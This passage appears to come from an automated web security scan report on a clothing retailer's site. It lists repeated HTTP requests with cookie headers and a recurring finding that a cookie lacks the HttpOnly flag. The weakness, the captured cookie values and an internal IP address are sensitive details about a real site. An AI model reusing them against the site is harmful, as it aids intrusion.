GET /limited-edition/men/liberty-blank-canvas/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/new-styles/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/shorts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/men/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/accessories/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/bags/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/blank-canvas-ann-sofie-back/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/collaboration/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=8ouf9mi5qpo5h66pih8ognai31; expires=Tue, 09-Nov-2010 17:11:28 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/dresses/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/footwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/jessica-ogden/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=596f22tdrdod98cur9st4it5d2; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/new-styles/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/shorts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/skirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /limited-edition/women/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men - F ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/t-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/tennis/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/track-jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /men/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /productinfo/clothingsizes/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /productinfo/footwearsizes/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /productinfo/garmentcare/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sale/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shops/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /site-map/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Site Ma ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
